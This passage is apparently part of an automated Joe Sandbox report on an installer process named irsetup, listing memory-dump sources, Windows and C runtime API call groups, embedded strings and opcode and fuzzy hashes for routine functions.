                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1310268301-0
                                                                                                                    • Opcode ID: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
                                                                                                                    • Instruction ID: c9725b456daa9fdbd47dcba6a1973a2d1d59f8ec4ab8946eea0d685f15fedc00
                                                                                                                    • Opcode Fuzzy Hash: 9b59964a37983f2b84c531a821adbeb9d19dfcd695d3bb90245f03d9e5caed93
                                                                                                                    • Instruction Fuzzy Hash: D221D331301A4C81EAA3AF21E8457EBA391B34D7C0F44C835BA4D0778AEEB8C28CC341
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
                                                                                                                    • Instruction ID: 243d979cf980d91638068ba1cf51c6dd2d398df9d072928e8bbb030d2aa91185
                                                                                                                    • Opcode Fuzzy Hash: 155953e9e9487b941f1044b1c903ed904f3cf64617d1cd54c6d4fa03758ae0d7
                                                                                                                    • Instruction Fuzzy Hash: FC015E31215A0886EBE28F21F9803966360F74DBD4F46A621FE5E477A4DF39CA9D8300
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576963644.00007FF68B8E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF68B8E0000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576910208.00007FF68B8E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577432527.00007FF68BC3A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577638468.00007FF68BD69000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577716635.00007FF68BD76000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD79000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD85000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577769794.00007FF68BD97000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577929974.00007FF68BD9A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4577985616.00007FF68BDBF000.00000010.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4578037036.00007FF68BDC2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_7ff68b8e0000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1445889803-0
                                                                                                                    • Opcode ID: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
                                                                                                                    • Instruction ID: 892f41c59e14a90b1868d20cedad64db0f3a3e280163284b2d5719743edeb272
                                                                                                                    • Opcode Fuzzy Hash: 9c85b3c5196d6b797aa64e67c1447ecb68c40010fb4304309066dacb49b6665b
                                                                                                                    • Instruction Fuzzy Hash: 7001A122669A46C1EB508F21EC402696370FF0DBA0F856638EE5E877B4DF7CD895C740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getbuf
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 606515832-3267037135
                                                                                                                    • Opcode ID: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
                                                                                                                    • Instruction ID: d7cf500bb31369f41dd2bf305ad7167dfc6d28a841a02d62a1bb6ec0d038c543
                                                                                                                    • Opcode Fuzzy Hash: 31b0e7f23d037101d8f3db491ca91a05c1c77b1233f9034071453cf5650caed2
                                                                                                                    • Instruction Fuzzy Hash: 5A41C272600B4886EBAB9F28D4513AE37A0E78CFD4F168215FA6A473D6DF34CA55C740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: FILE*$attempt to use a closed file$cur
                                                                                                                    • API String ID: 2918714741-2248676531
                                                                                                                    • Opcode ID: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
                                                                                                                    • Instruction ID: 6c949a32b7c445aad4823cac95b0331f89fcc6844e5a922ae23727c4ae02fac2
                                                                                                                    • Opcode Fuzzy Hash: b9167f225a1a843d12c92d94147ff570959b0eac6a117e260998413cbc5ec83f
                                                                                                                    • Instruction Fuzzy Hash: CB216F71705A4881FB92EB52E5913EA6365E78DBC0F45C022FE4917B9ACE38C74E8740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errnofflush
                                                                                                                    • String ID: FILE*$attempt to use a closed file
                                                                                                                    • API String ID: 748766958-999929173
                                                                                                                    • Opcode ID: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
                                                                                                                    • Instruction ID: effcfa852fb6302185ee5319f9c93b9d90322d014ae9de1df5db582a5132b004
                                                                                                                    • Opcode Fuzzy Hash: e1f0293b8a37bcc107eab8604bf93ac0379de7c48efdfe4c912e06844dc65ac9
                                                                                                                    • Instruction Fuzzy Hash: F7117C31704A8881FB82EB52E1913EA6361A789BC0F448022BE0917B9ACE6CC6898740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _getptd_lockfree
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 3892346632-3267037135
                                                                                                                    • Opcode ID: e532da2cad900d3c0d80d82f3a1980227b16755320fb1000287129ea2ba09196
                                                                                                                    • Instruction ID: 4a9433009a0817146d8213779e3cdba636acc00540cdeb6e6f7f8c89661ab616
                                                                                                                    • Instruction Fuzzy Hash: A8115E31261B8882EAD79B50E4807E873A0F78DBC8F498125FA1D03791DF34CA5DC701
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 00000001800207FF
                                                                                                                    • GetProcAddress.KERNEL32(?,?,000000FF,0000000180020839,?,?,00000028,000000018002D429,?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D), ref: 0000000180020814
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 1646373207-1276376045
                                                                                                                    • Opcode ID: 143e8cc6326776dad3d0c38c552a3e355c10da91fdedafbeeb96d0b3556e98d8
                                                                                                                    • Instruction ID: 8eca91b44297037b0ac9d1d6b010f20b8df3b1a68d07564286341e8c3e27f513
                                                                                                                    • Instruction Fuzzy Hash: D7E01234B11B0851FE9B5F91A8E43A51390AB4C780F499829985E06391DF68878D8394
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002BF5C: malloc.LIBCMT ref: 000000018002BF7B
                                                                                                                      • Part of subcall function 000000018002BF5C: Sleep.KERNEL32(?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5,?,?,00000000,000000018002C2AC), ref: 000000018002BF92
                                                                                                                    • free.LIBCMT ref: 0000000180028D99
                                                                                                                    • free.LIBCMT ref: 0000000180028DB5
                                                                                                                      • Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
                                                                                                                      • Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
                                                                                                                      • Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
                                                                                                                      • Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
                                                                                                                      • Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
                                                                                                                      • Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
                                                                                                                      • Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
                                                                                                                      • Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A
                                                                                                                    • free.LIBCMT ref: 0000000180028DCA
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    • free.LIBCMT ref: 0000000180028DE9
                                                                                                                    • free.LIBCMT ref: 0000000180028E05
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentSleepTerminateUnwindVirtualmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1498969394-0
                                                                                                                    • Opcode ID: 4ee83ada38aec8174198e6d25d5b418d62bd8dae8a883d0a04d60064cdfc57a1
                                                                                                                    • Instruction ID: e4a9b29ca778be11defb2c39dc2281dcbbc2f6ed8a753c597f6380265792a982
                                                                                                                    • Instruction Fuzzy Hash: 1D517236201E4886EBA39F25E8403DD3355F788BD8F598026FE8D47795DE38CA8AC344
                                                                                                                    Similarity
                                                                                                                    • API ID: _getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3186804695-0
                                                                                                                    • Opcode ID: c0d3ae45891e9377bb4204286041f6db8ff33de922250e1434e3fc09dcfaf439
                                                                                                                    • Instruction ID: 8693baa525cc390d4e04389ed9084d09a48d9bf4543c762d9cd6e86b7275e954
                                                                                                                    • Instruction Fuzzy Hash: 5281B072205B8996EBA6DF65E1847DE73A0F3487C4F508126EB8D43B94DF38D258CB00
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalSection_lock$EnterLeave
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2641352136-0
                                                                                                                    • Opcode ID: 33db83eaa1e316c93853d291dc9a5ec5e343c6e9d5295868659055a985429795
                                                                                                                    • Instruction ID: f39b5f0a46982969517bee665c5b07b8d69fc09acf0904b0d854b37e53922783
                                                                                                                    • Instruction Fuzzy Hash: 9D510932201B8886EB93CF55E4403AA7791F7987E8F46C216FA5A067E5CF78C619C701
                                                                                                                    Similarity
                                                                                                                    • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4201827665-0
                                                                                                                    • Opcode ID: cdde0ef7817295929428664d31e209b21e59383b411da0fe62d0ca1bae79407c
                                                                                                                    • Instruction ID: 460a503547ebc5d843fb0f47162114160bb622de7595eaa0c997af710718bdb1
                                                                                                                    • Instruction Fuzzy Hash: D151AC31602A8886F7D7EB25E884BEA2391FB4D7C8F11C525FE5A43792DE78C6498704
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalDeleteSection$Freefree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1250194111-0
                                                                                                                    • Opcode ID: d778b9450493a088483ca8ae6e5173535179b62c543e66aa7f4c25907cef4323
                                                                                                                    • Instruction ID: 70892d1e86e0fe61b579319fcbecef8552250517042c71bfe73d972997a8cc6e
                                                                                                                    • Instruction Fuzzy Hash: 51119E31605A4CD6FBA78B11E9503A97360E70DBE4F588212FA5502B95CF68CAA9C701
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer_errno_flush_freebuf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1889905870-0
                                                                                                                    • Opcode ID: 2ae9cf7a8c2a355d5a7111981e7cb442d45bfb4cbdb5125c3947bd730f3ae73c
                                                                                                                    • Instruction ID: 21c6b32f25e86580c02bfc281b2be964b159bf8c721c44a871fe3adfba9ac30f
                                                                                                                    • Instruction Fuzzy Hash: 6801D432614A8842FFE7EA7598123FD12516B9E7E8F29C322BA15871D2CE38C6088301
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    • Opcode ID: 9747b211fa7aa75ef0586c585c49f8864b2e4b48e6be273d406063ce42c8b046
                                                                                                                    • Instruction ID: 222b8468457cde4f875127d20ef24c91f9358582f200ea179a318cfe432f40bb
                                                                                                                    • Instruction Fuzzy Hash: 54012B72625A8C41FB975FA9C8513FD275197997E5F92C302FA2E063E2CF3C42088701
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: #
                                                                                                                    • API String ID: 3432092939-1885708031
                                                                                                                    • Opcode ID: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
                                                                                                                    • Instruction ID: a15908a98ec50fe91217ef7d26e318360d1aa3a5f1900967077516d825dfa4f5
                                                                                                                    • Opcode Fuzzy Hash: 581a0b2716e9520c78d58f123274437518bb154b9191c5d7100b2b71d979de97
                                                                                                                    • Instruction Fuzzy Hash: B5518236206BD885E7A38F15E4403EEBBA0F789B94F548111EB8953B55CE39C949DB01
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getptd
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3432092939-2547889144
                                                                                                                    • Opcode ID: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
                                                                                                                    • Instruction ID: 18eb19642d1af780b867c0ab745fc5cb88b23faebf2bc774daddc210fbea8dfb
                                                                                                                    • Opcode Fuzzy Hash: d8eb24f12b1e7f04df8eae803c5dec19a6ac15cb438d744559f954a93dff403f
                                                                                                                    • Instruction Fuzzy Hash: 5941D672904B8881E7A38B25E4543EA77A0F75ABD5F15C222FB9807BE4CF38C659C700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_getbuf
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 606515832-2766056989
                                                                                                                    • Opcode ID: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
                                                                                                                    • Instruction ID: 3d19db322e9b86e5fe25d9977a452369542916dbcc5a558c71ed9a950448e357
                                                                                                                    • Opcode Fuzzy Hash: 9403ab3ef98fcd551828b2de61521df5847ccb3f5e9c5ac512d620e411e02bf9
                                                                                                                    • Instruction Fuzzy Hash: 8A31EA72604ECC41EBE78F28D4953AD2691A75ABECF58C206FE1A062D5CF78CA59C341
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2310398763-2766056989
                                                                                                                    • Opcode ID: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
                                                                                                                    • Instruction ID: a84850765988291fd4f17f9da1824d97baa36799c8467e6cf5b96115ea6561ae
                                                                                                                    • Opcode Fuzzy Hash: 74ba7703ef3d89e0c7b0560970d3bf7eb981cfd676f65553a41b505a14b5294c
                                                                                                                    • Instruction Fuzzy Hash: A9310D32600E8D41EBE7DB3998513FD225167897E4F64C32BFE29466D5DF38C61A8301
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: 1
                                                                                                                    • API String ID: 2918714741-2212294583
                                                                                                                    • Opcode ID: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
                                                                                                                    • Instruction ID: 9d0cc6883bf45aa8de4f31950166c67cd5585dda591aea29b30f3553ffaa3b73
                                                                                                                    • Opcode Fuzzy Hash: 46d2f9773c3c74fcab1c881f3f148963bc3bc4c9c84ae9032c3a66bf402617d8
                                                                                                                    • Instruction Fuzzy Hash: 7E21F83261AAC855FBE79B68C4143EF7B91A74E7C0F5AC411B745062C3DE6D8B08C711
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: __close$file is already closed
                                                                                                                    • API String ID: 2918714741-3567927775
                                                                                                                    • Opcode ID: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
                                                                                                                    • Instruction ID: 5212b77ea421d767a63583ebfe1c0c3f01a91f7c6577d08a4d905ae789f47158
                                                                                                                    • Opcode Fuzzy Hash: dd34c21ef1cb93705251fd7510c9b52bb08e8fdba4894b81b0dbd31642b777f2
                                                                                                                    • Instruction Fuzzy Hash: 2F21C531710A8981FAD6EB66A8013DE7341ABCDBD0F58D132BD1A0B3DADE38C6498740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: %s: %s$FILE*
                                                                                                                    • API String ID: 2918714741-2400621551
                                                                                                                    • Opcode ID: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
                                                                                                                    • Instruction ID: accc405d7271c740622e845d5831acabee4d184a8a30b13b1a844166888f6864
                                                                                                                    • Opcode Fuzzy Hash: 910dafadb65821362d6d548511ac076f068beffe28083bae02cf5223914a01d8
                                                                                                                    • Instruction Fuzzy Hash: DF218131315B8885FA92EB22A8517DA3364AB8DBC0F44C122BD490B797DF38C60E8741
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno
                                                                                                                    • String ID: %s: %s$FILE*
                                                                                                                    • API String ID: 2918714741-2400621551
                                                                                                                    • Opcode ID: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
                                                                                                                    • Instruction ID: 19c1d6e09956a2abd958a59b08d8592876308c72a2221f84d39e5e547afbcd58
                                                                                                                    • Opcode Fuzzy Hash: 7cf67dcd794677371bcfb2b39bc427531bcb3aaca4ae874a0c31b5ea197deb1a
                                                                                                                    • Instruction Fuzzy Hash: 7E218E31315B8885FAD2EB22A4517DA3354AB8ABC0F54C122BE490BB97DF39C60E8740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
